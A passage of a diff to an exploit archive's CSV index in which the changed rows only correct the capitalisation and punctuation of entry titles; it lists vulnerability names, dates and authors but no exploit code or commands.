33060,platforms/php/webapps/33060.txt,"phpMyAdmin 3.3.0 - 'db' Parameter Cross-Site Scripting",2009-05-30,r0t,php,webapps,0 33061,platforms/php/webapps/33061.php,"Joomla! 1.5.x - Cross-Site Scripting / Information Disclosure",2009-06-01,"Juan Galiana Lara",php,webapps,0 33062,platforms/windows/dos/33062.txt,"Apple Safari 4 - 'reload()' Denial of Service",2009-06-02,SkyOut,windows,dos,0 -33063,platforms/windows/remote/33063.txt,"Microsoft Internet Explorer 6.0 - 'javascript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,windows,remote,0 -33064,platforms/multiple/remote/33064.txt,"Google Chrome 0.3.154 - 'javascript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,multiple,remote,0 +33063,platforms/windows/remote/33063.txt,"Microsoft Internet Explorer 6 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,windows,remote,0 +33064,platforms/multiple/remote/33064.txt,"Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,multiple,remote,0 33065,platforms/php/webapps/33065.txt,"Horde 3.1 - 'Passwd' Module Cross-Site Scripting",2009-06-05,anonymous,php,webapps,0 33066,platforms/windows/remote/33066.html,"Avax Vector 1.3 - 'avPreview.ocx' ActiveX Control Buffer Overflow",2009-06-06,Satan_HackerS,windows,remote,0 33067,platforms/multiple/remote/33067.txt,"Winds3D Viewer 3 - 'GetURL()' Arbitrary File Download",2009-06-08,"Diego Juarez",multiple,remote,0 @@ -29830,7 +29831,7 @@ id,file,description,date,author,platform,type,port 33072,platforms/php/webapps/33072.txt,"Adem 0.5.1 - Local File Inclusion",2014-04-28,JIKO,php,webapps,80 33073,platforms/linux/dos/33073.c,"NTP ntpd monlist Query Reflection - Denial of Service",2014-04-28,"Danilo PC",linux,dos,123 33075,platforms/php/webapps/33075.txt,"GeoCore MAX DB Ver. 7.3.3 - Time-Based Blind Injection",2014-04-28,Esac,php,webapps,80 -33076,platforms/php/webapps/33076.txt,"Wordpress iMember360 Plugin 3.8.012 < 3.9.001 - Multiple Vulnerabilities",2014-04-28,"Everett Griffiths",php,webapps,80 +33076,platforms/php/webapps/33076.txt,"WordPress iMember360 Plugin 3.8.012 < 3.9.001 - Multiple Vulnerabilities",2014-04-28,"Everett Griffiths",php,webapps,80 33078,platforms/multiple/remote/33078.txt,"HP ProCurve Threat Management Services - zl ST.1.0.090213 Module CRL Security Bypass",2009-06-13,anonymous,multiple,remote,0 33079,platforms/multiple/remote/33079.txt,"Oracle Weblogic Server 10.3 - 'console-help.portal' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 33080,platforms/multiple/dos/33080.txt,"Oracle 11.1 - Database Network Foundation Heap Memory Corruption",2009-06-14,"Dennis Yurichev",multiple,dos,0 @@ -29863,10 +29864,10 @@ id,file,description,date,author,platform,type,port 33103,platforms/linux/remote/33103.html,"Mozilla Firefox 3.5.1 - Error Page Address Bar URI Spoofing",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0 33104,platforms/multiple/dos/33104.txt,"Star Wars Battlefront II 1.1 - Remote Denial of Service",2009-06-24,"Luigi Auriemma",multiple,dos,0 33105,platforms/multiple/dos/33105.txt,"TrackMania 2.11.11 - Multiple Remote Vulnerabilities",2009-06-27,"Luigi Auriemma",multiple,dos,0 -33106,platforms/php/webapps/33106.txt,"PG MatchMaking - browse_ladies.php show Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 -33107,platforms/php/webapps/33107.txt,"PG MatchMaking - browse_men.php show Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 -33108,platforms/php/webapps/33108.txt,"PG MatchMaking - search.php show Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 -33109,platforms/php/webapps/33109.txt,"PG MatchMaking - services.php show Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 +33106,platforms/php/webapps/33106.txt,"PG Matchmaking - browse_ladies.php show Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 +33107,platforms/php/webapps/33107.txt,"PG Matchmaking - browse_men.php show Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 +33108,platforms/php/webapps/33108.txt,"PG Matchmaking - search.php show Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 +33109,platforms/php/webapps/33109.txt,"PG Matchmaking - services.php show Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 33110,platforms/php/webapps/33110.txt,"XZeroScripts XZero Community Classifieds 4.97.8 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-24,Moudi,php,webapps,0 33111,platforms/php/webapps/33111.txt,"AIOCP 1.4 - 'cp_html2txt.php' Remote File Inclusion",2009-06-27,"Hadi Kiamarsi",php,webapps,0 33112,platforms/php/webapps/33112.txt,"PG Roommate Finder Solution - quick_search.php part Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0 @@ -29879,7 +29880,7 @@ id,file,description,date,author,platform,type,port 33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - courses_login.php cat_id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - news_read.php id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - lessons_login.php Multiple Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 -33122,platforms/php/webapps/33122.txt,"Joomla! 'com_user' Component - 'view' Parameter URI Redirection",2009-06-27,"599eme Man",php,webapps,0 +33122,platforms/php/webapps/33122.txt,"Joomla! 'com_user' Component - 'view' Parameter URI redirection",2009-06-27,"599eme Man",php,webapps,0 33123,platforms/multiple/remote/33123.html,"Google Chrome 2.0.172 - 'About:blank' Address Bar URI Spoofing 'About:blank' Address Bar URI Spoofing",2009-06-28,Lostmon,multiple,remote,0 33124,platforms/multiple/remote/33124.txt,"Google Chrome 2.0.172 - 'chrome://history/' URI Cross-Site Scripting",2009-06-28,"Karn Ganeshen",multiple,remote,0 33125,platforms/php/webapps/33125.txt,"Joomla! Permis 1.0 ('com_groups') Component - 'id' Parameter SQL Injection",2009-06-28,Prince_Pwn3r,php,webapps,0 @@ -29887,7 +29888,7 @@ id,file,description,date,author,platform,type,port 33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps,0 40080,platforms/php/webapps/40080.txt,"Tiki Wiki CMS 15.0 - Arbitrary File Download",2016-07-11,"Kacper Szurek",php,webapps,80 40081,platforms/cgi/webapps/40081.py,"Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass",2016-07-11,"Gregory Smiley",cgi,webapps,80 -40082,platforms/php/webapps/40082.txt,"Wordpress All in One SEO Pack Plugin 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",php,webapps,80 +40082,platforms/php/webapps/40082.txt,"WordPress All in One SEO Pack Plugin 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",php,webapps,80 33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 - category.php cat Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps,0 33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 - 'op' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0 @@ -29898,7 +29899,7 @@ id,file,description,date,author,platform,type,port 33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0 33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",hardware,webapps,0 33584,platforms/multiple/dos/33584.txt,"IBM DB2 - 'kuddb2' Remote Denial of Service",2010-01-31,"Evgeny Legerov",multiple,dos,0 -33142,platforms/multiple/remote/33142.rb,"Apache Struts - ClassLoader Manipulation Remote Code Execution",2014-05-02,Metasploit,multiple,remote,8080 +33142,platforms/multiple/remote/33142.rb,"Apache Struts - ClassLoader manipulation Remote Code Execution",2014-05-02,Metasploit,multiple,remote,8080 33143,platforms/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (Metasploit)",2014-05-02,"Brandon Perry",hardware,remote,443 33144,platforms/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0 33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework - Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0 @@ -29956,7 +29957,7 @@ id,file,description,date,author,platform,type,port 33202,platforms/php/webapps/33202.txt,"68 Classifieds 4.1 - viewmember.php member Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 33203,platforms/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Secuity Bypass",2009-09-02,"Johannes Dahse",multiple,remote,0 33204,platforms/php/webapps/33204.txt,"phpAuction 3.2 - 'lan' Parameter Remote File Inclusion",2009-09-09,"Beenu Arora",php,webapps,0 -33205,platforms/windows/dos/33205.pl,"Nokia Multimedia Player 1.1 - Remote Denial of Service",2009-09-01,"opt!x hacker",windows,dos,0 +33205,platforms/windows/dos/33205.pl,"Nokia MultiMedia Player 1.1 - Remote Denial of Service",2009-09-01,"opt!x hacker",windows,dos,0 33206,platforms/php/webapps/33206.txt,"MKPortal 1.x - Multiple Modules Cross-Site Scripting Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 33207,platforms/windows/remote/33207.txt,"SmartVMD 1.3 - ActiveX Control 'VideoMovementDetection.dll' Buffer Overflow",2009-09-01,"optix hacker",windows,remote,0 33208,platforms/php/webapps/33208.txt,"MKPortal 1.x - Multiple BBCode HTML Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 @@ -29964,7 +29965,7 @@ id,file,description,date,author,platform,type,port 33210,platforms/multiple/remote/33210.txt,"HP Operations Manager - Default Manager 8.1 Account Remote Security",2009-09-03,Intevydis,multiple,remote,0 33211,platforms/multiple/remote/33211.txt,"HP Operations Dashboard 2.1 - Portal Default Manager Account Remote Security",2009-09-03,Intevydis,multiple,remote,0 33212,platforms/windows/remote/33212.rb,"Adobe Flash Player - Integer Underflow Remote Code Execution",2014-05-06,Metasploit,windows,remote,0 -33213,platforms/windows/local/33213.rb,"Windows - NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)",2014-05-06,Metasploit,windows,local,0 +33213,platforms/windows/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)",2014-05-06,Metasploit,windows,local,0 33214,platforms/php/webapps/33214.txt,"DvBBS 2.0 - 'boardrule.php' SQL Injection",2009-09-04,Securitylab.ir,php,webapps,0 33215,platforms/multiple/remote/33215.txt,"IBM Tivoli Identity Manager 5.0.5 - User Profile HTML Injection",2009-08-26,IBM,multiple,remote,0 33216,platforms/hardware/dos/33216.txt,"Check Point Endpoint Security - Full Disk Encryption RDP Connection Denial of Service",2009-09-09,"Tim Medin",hardware,dos,0 @@ -29972,13 +29973,13 @@ id,file,description,date,author,platform,type,port 33218,platforms/php/webapps/33218.txt,"Joomla! 'com_mediaalert' Component - 'id' Parameter SQL Injection",2009-09-11,Moudi,php,webapps,0 33219,platforms/php/webapps/33219.txt,"Planet 2.0 - HTML Injection",2009-09-11,"Steve Kemp",php,webapps,0 33220,platforms/windows/dos/33220.txt,"FileCOPA FTP Server 5.01 - 'NOOP' Command Denial Of Service",2009-09-15,"Asheesh kumar Mani Tripathi",windows,dos,0 -33221,platforms/windows/dos/33221.html,"Novell GroupWise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow",2009-09-15,"Francis Provencher",windows,dos,0 +33221,platforms/windows/dos/33221.html,"Novell Groupwise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow",2009-09-15,"Francis Provencher",windows,dos,0 33222,platforms/linux/dos/33222.txt,"Wireshark 1.2.1 - OpcUa Dissector Unspecified Resource Exhaustion Denial of Service",2009-09-15,"Buildbot Builder",linux,dos,0 33223,platforms/linux/dos/33223.txt,"Wireshark 1.2.1 - TLS Dissector 1.2 Conversation Handling Unspecified Remote Denial of Service",2009-09-15,"Buildbot Builder",linux,dos,0 33224,platforms/linux/dos/33224.txt,"Wireshark 1.2.1 - GSM A RR Dissector packet.c Unspecified Remote Denial of Service",2009-09-15,"Buildbot Builder",linux,dos,0 33225,platforms/windows/dos/33225.html,"EasyMail Objects 6.0.2.0 - 'emimap4.dll' ActiveX Control Remote Code Execution",2009-09-15,"Francis Provencher",windows,dos,0 33226,platforms/php/webapps/33226.txt,"Mega File Hosting Script 1.2 - 'emaillinks.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 -33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris GuestBook - 'view.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 +33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris Guestbook - 'view.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 33228,platforms/linux/dos/33228.txt,"Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow",2009-09-16,"Xiao Guangrong",linux,dos,0 33229,platforms/bsd/local/33229.c,"NetBSD 5.0.1 - 'IRET' General Protection Fault Handling Privilege Escalation",2009-09-16,"Tavis Ormandy",bsd,local,0 33230,platforms/linux/dos/33230.txt,"GNU glibc 2.x - 'strfmon()' Function Integer Overflow",2009-09-17,"Maksymilian Arciemowicz",linux,dos,0 @@ -29987,7 +29988,7 @@ id,file,description,date,author,platform,type,port 33233,platforms/linux/dos/33233.txt,"FFmpeg 0.5 - Multiple Remote Vulnerabilities",2009-09-21,"Will Dormann",linux,dos,0 33234,platforms/hardware/remote/33234.txt,"Check Point Connectra R62 - '/Login/Login' Arbitrary Script Injection",2009-09-21,"Stefan Friedli",hardware,remote,0 33235,platforms/osx/dos/33235.rb,"Apple iTunes 9.0 - '.pls' Buffer Overflow",2009-09-22,"Roger Hart",osx,dos,0 -33236,platforms/asp/webapps/33236.txt,"MaxWebPortal 1.365 - 'forum.asp' SQL Injection",2009-09-22,OoN_Boy,asp,webapps,0 +33236,platforms/asp/webapps/33236.txt,"Maxwebportal 1.365 - 'forum.asp' SQL Injection",2009-09-22,OoN_Boy,asp,webapps,0 33237,platforms/php/webapps/33237.txt,"Joomla! SportFusion 0.2.x - Component SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 33238,platforms/php/webapps/33238.txt,"Joomla! JoomlaFacebook Component - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 33239,platforms/php/webapps/33239.txt,"Vastal I-Tech Cosmetics Zone - 'view_products.php' SQL Injection",2009-09-22,OoN_Boy,php,webapps,0 @@ -30023,7 +30024,7 @@ id,file,description,date,author,platform,type,port 33271,platforms/windows/dos/33271.py,"VMware Player and Workstation 6.5.3 - 'VMware-authd' Remote Denial of Service",2009-10-07,shinnai,windows,dos,0 33272,platforms/windows/remote/33272.txt,"Autodesk 3ds - Max Application Callbacks Arbitrary Command Execution",2009-10-23,"Sebastian Tello",windows,remote,0 33264,platforms/windows/remote/33264.txt,"Microsoft Internet Explorer 8 - X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",windows,remote,0 -33273,platforms/windows/remote/33273.scn,"Autodesk Softimage 7.0 Scene - .TOC File Remote Code Execution",2009-11-23,"Diego Juarez",windows,remote,0 +33273,platforms/windows/remote/33273.scn,"Autodesk SoftImage 7.0 Scene - '.TOC' File Remote Code Execution",2009-11-23,"Diego Juarez",windows,remote,0 33590,platforms/php/webapps/33590.txt,"Joomla! AutartiTarot Component - Directory Traversal",2010-02-01,B-HUNT3|2,php,webapps,0 33645,platforms/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Command Directory Traversal",2010-02-15,fb1h2s,windows,remote,0 33342,platforms/php/webapps/33342.txt,"CuteNews 1.4.6 - search.php Multiple Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0 @@ -30032,14 +30033,14 @@ id,file,description,date,author,platform,type,port 33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 - 'index.php' Cross-Site Scripting / SQL Injection",2009-10-13,infosecstuff,php,webapps,0 33283,platforms/linux/dos/33283.txt,"Adobe Reader 9.1.3 and Acrobat - COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,linux,dos,0 33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0 -33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection (Metasploit)",2014-05-12,"Chris Hebert",php,webapps,443 +33317,platforms/php/webapps/33317.txt,"Alienvault OSSIM 4.6.1 - Authenticated SQL Injection (Metasploit)",2014-05-12,"Chris Hebert",php,webapps,443 33286,platforms/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Parameter Cross-Site Scripting",2009-10-14,"Michele Orru",java,webapps,0 -33287,platforms/php/webapps/33287.txt,"bloofoxCMS 0.3.5 - 'search' Parameter Cross-Site Scripting",2009-10-15,"drunken danish rednecks",php,webapps,0 +33287,platforms/php/webapps/33287.txt,"BloofoxCMS 0.3.5 - 'search' Parameter Cross-Site Scripting",2009-10-15,"drunken danish rednecks",php,webapps,0 33288,platforms/php/webapps/33288.txt,"Zainu 1.0 - 'searchSongKeyword' Parameter Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0 33289,platforms/linux/dos/33289.txt,"Linux Kernel 2.6.x - '/drivers/net/r8169.c' Out-of-IOMMU Error Local Denial of Service",2009-08-28,"Alistair Strachan",linux,dos,0 33290,platforms/php/webapps/33290.txt,"Snitz Forums 2000 3.4.7 - pop_send_to_friend.asp url Parameter Cross-Site Scripting",2009-10-15,"Andrea Fabrizi",php,webapps,0 33291,platforms/php/webapps/33291.txt,"Snitz Forums 2000 3.4.7 - Sound Tag Onload Attribute Cross-Site Scripting",2009-10-15,"Andrea Fabrizi",php,webapps,0 -33292,platforms/jsp/webapps/33292.txt,"IBM Rational RequisitePro 7.10 - ReqWeb Help Feature ReqWebHelp/advanced/workingSet.jsp operation Parameter Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 +33292,platforms/jsp/webapps/33292.txt,"IBM Rational RequisitePro 7.10 - ReqWeb Help Feature ReqWebHelp/advanced/workingSet.jsp Operation Parameter Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 33293,platforms/jsp/webapps/33293.txt,"IBM Rational RequisitePro 7.10 - ReqWeb Help Feature ReqWebHelp/basic/searchView.jsp Multiple Parameter Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 33294,platforms/php/webapps/33294.txt,"TBmnetCMS 1.0 - 'content' Parameter Cross-Site Scripting",2009-10-19,"drunken danish rednecks",php,webapps,0 33295,platforms/php/webapps/33295.txt,"OpenDocMan 1.2.5 - add.php last_message Parameter Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps,0 @@ -30071,18 +30072,18 @@ id,file,description,date,author,platform,type,port 33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x - 'pipe.c' Privilege Escalation (2)",2009-11-03,"teach & xipe",linux,local,0 33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 - Slow Request Handling Remote Denial Of Service",2010-02-02,"Li Ming",linux,dos,0 33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service",2010-02-02,"Marcelo Tosatti",linux,dos,0 -33593,platforms/windows/local/33593.c,"Microsoft Windows 2000/XP/2003/Vista - Double Free Memory Corruption Privilege Escalation",2010-02-09,"Tavis Ormandy",windows,local,0 -33594,platforms/windows/remote/33594.txt,"Microsoft Windows VISTA/2008 - ICMPv6 Router Advertisement Remote Code Execution",2010-02-09,"Sumit Gwalani",windows,remote,0 +33593,platforms/windows/local/33593.c,"Microsoft Windows 2000/XP/2003/Vista - Double-Free Memory Corruption Privilege Escalation",2010-02-09,"Tavis Ormandy",windows,local,0 +33594,platforms/windows/remote/33594.txt,"Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution",2010-02-09,"Sumit Gwalani",windows,remote,0 33326,platforms/windows/remote/33326.py,"Easy Chat Server 3.1 - Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote,0 33327,platforms/hardware/webapps/33327.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Information Disclosure",2014-05-12,"Luigi Vezzoso",hardware,webapps,0 33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial Of Service Issue",2014-05-12,"Luigi Vezzoso",hardware,dos,0 33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 - search.php from_date_day Parameter Full Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0 33330,platforms/windows/webapps/33330.txt,"SpiceWorks 7.2.00174 - Persistent Cross-Site Scripting",2014-05-12,"Dolev Farhi",windows,webapps,80 33331,platforms/windows/remote/33331.rb,"Yokogawa CS3000 - BKESimmgr.exe Buffer Overflow",2014-05-12,Metasploit,windows,remote,34205 -33332,platforms/windows/dos/33332.py,"JetAudio 8.1.1 - (.ogg) Crash (PoC)",2014-05-12,"Aryan Bayaninejad",windows,dos,0 +33332,platforms/windows/dos/33332.py,"JetAudio 8.1.1 - '.ogg' Crash (PoC)",2014-05-12,"Aryan Bayaninejad",windows,dos,0 33333,platforms/windows/remote/33333.rb,"Adobe Flash Player - Shader Buffer Overflow",2014-05-12,Metasploit,windows,remote,0 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80 -33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash (PoC)",2014-05-12,"Aryan Bayaninejad",windows,dos,0 +33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - '.ogg' Crash (PoC)",2014-05-12,"Aryan Bayaninejad",windows,dos,0 33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Privilege Escalation (3)",2013-02-24,SynQ,linux,local,0 33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80 33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 - area.php Multiple Parameter Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 @@ -30091,19 +30092,19 @@ id,file,description,date,author,platform,type,port 33357,platforms/php/webapps/33357.txt,"PHD Help Desk 1.43 - atributo.php URL Parameter Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 33358,platforms/php/webapps/33358.txt,"PHD Help Desk 1.43 - atributo_list.php Multiple Parameter Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 33359,platforms/php/webapps/33359.txt,"PHD Help Desk 1.43 - caso_insert.php URL Parameter Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps,0 -33360,platforms/windows/local/33360.c,"Avast! Antivirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,windows,local,0 +33360,platforms/windows/local/33360.c,"Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,windows,local,0 33361,platforms/asp/webapps/33361.txt,"Multiple JiRo's Products - 'files/login.asp' Multiple SQL Injection",2009-11-17,blackenedsecurity,asp,webapps,0 -33362,platforms/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 - 'productId' Parameter SQL Injection",2009-11-19,"Sangte Amtham",php,webapps,0 +33362,platforms/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 - 'ProductID' Parameter SQL Injection",2009-11-19,"Sangte Amtham",php,webapps,0 33363,platforms/multiple/remote/33363.txt,"Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",multiple,remote,0 33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 - KDELibs 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0 -33365,platforms/php/webapps/33365.txt,"Wordpress WP-phpList Plugin 2.10.2 - 'unsubscribeemail' Parameter Cross-Site Scripting",2009-11-29,MustLive,php,webapps,0 -33366,platforms/php/webapps/33366.txt,"Wordpress Trashbin Plugin 0.1 - 'mtb_undelete' Parameter Cross-Site Scripting",2009-11-15,MustLive,php,webapps,0 -33367,platforms/php/webapps/33367.txt,"FireStats Wordpress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0 -33368,platforms/php/webapps/33368.html,"FireStats Wordpress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 +33365,platforms/php/webapps/33365.txt,"WordPress WP-phpList Plugin 2.10.2 - 'unsubscribeemail' Parameter Cross-Site Scripting",2009-11-29,MustLive,php,webapps,0 +33366,platforms/php/webapps/33366.txt,"WordPress Trashbin Plugin 0.1 - 'mtb_undelete' Parameter Cross-Site Scripting",2009-11-15,MustLive,php,webapps,0 +33367,platforms/php/webapps/33367.txt,"Firestats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0 +33368,platforms/php/webapps/33368.html,"Firestats WordPress Plugin 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 33370,platforms/multiple/webapps/33370.html,"ElasticSearch - Remote Code Execution",2014-05-15,"Jeff Geiger",multiple,webapps,0 -33371,platforms/php/webapps/33371.txt,"Wordpress WP-Cumulus Plugin 1.x - 'tagcloud.swf' Cross-Site Scripting",2009-11-09,MustLive,php,webapps,0 -33372,platforms/php/webapps/33372.html,"Fuctweb CapCC Plugin 1.0 for Wordpress CAPTCHA - Security Bypass",2009-11-13,MustLive,php,webapps,0 -33373,platforms/php/webapps/33373.txt,"Subscribe to Comments 2.0 Wordpress Plugin - Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps,0 +33371,platforms/php/webapps/33371.txt,"WordPress WP-Cumulus Plugin 1.x - 'tagcloud.swf' Cross-Site Scripting",2009-11-09,MustLive,php,webapps,0 +33372,platforms/php/webapps/33372.html,"Fuctweb CapCC Plugin 1.0 for WordPress CAPTCHA - Security Bypass",2009-11-13,MustLive,php,webapps,0 +33373,platforms/php/webapps/33373.txt,"Subscribe to Comments 2.0 WordPress Plugin - Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps,0 33374,platforms/php/webapps/33374.txt,"Cacti 0.8.x - graph.php Multiple Parameter Cross-Site Scripting",2009-11-21,"Moritz Naumann",php,webapps,0 33375,platforms/php/webapps/33375.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Delete Function Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0 33376,platforms/php/webapps/33376.pl,"klinza Professional CMS 5.0.1 - 'menulast.php' Local File Inclusion",2009-11-24,klinza,php,webapps,0 @@ -30112,15 +30113,15 @@ id,file,description,date,author,platform,type,port 33379,platforms/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,multiple,remote,0 33380,platforms/php/webapps/33380.txt,"Power Phlogger 2.2.x - Cross-Site Scripting",2008-02-16,MustLive,php,webapps,0 33381,platforms/php/webapps/33381.txt,"Content Module 0.5 for XOOPS - 'id' Parameter SQL Injection",2009-11-30,s4r4d0,php,webapps,0 -33382,platforms/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS - 'categoryid' Parameter Cross-Site Scripting",2009-11-30,SoldierOfAllah,php,webapps,0 -33383,platforms/php/webapps/33383.txt,"Elxis - 'filename' Parameter Directory Traversal",2009-11-30,"cr4wl3r ",php,webapps,0 +33382,platforms/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS - 'categoryId' Parameter Cross-Site Scripting",2009-11-30,SoldierOfAllah,php,webapps,0 +33383,platforms/php/webapps/33383.txt,"Elxis - 'Filename' Parameter Directory Traversal",2009-11-30,"cr4wl3r ",php,webapps,0 33384,platforms/windows/dos/33384.py,"Wireshark 1.10.7 - Denial of Service (PoC)",2014-05-16,"Osanda Malith",windows,dos,0 33385,platforms/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",php,webapps,0 33386,platforms/multiple/dos/33386.html,"Mozilla Firefox 29.0 - Null Pointer Dereference",2014-05-16,Mr.XHat,multiple,dos,0 33387,platforms/linux/local/33387.txt,"check_dhcp - Nagios Plugins 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0 -33388,platforms/linux/remote/33388.f,"Xfig and Transfig 3.2.5 - .fig Buffer 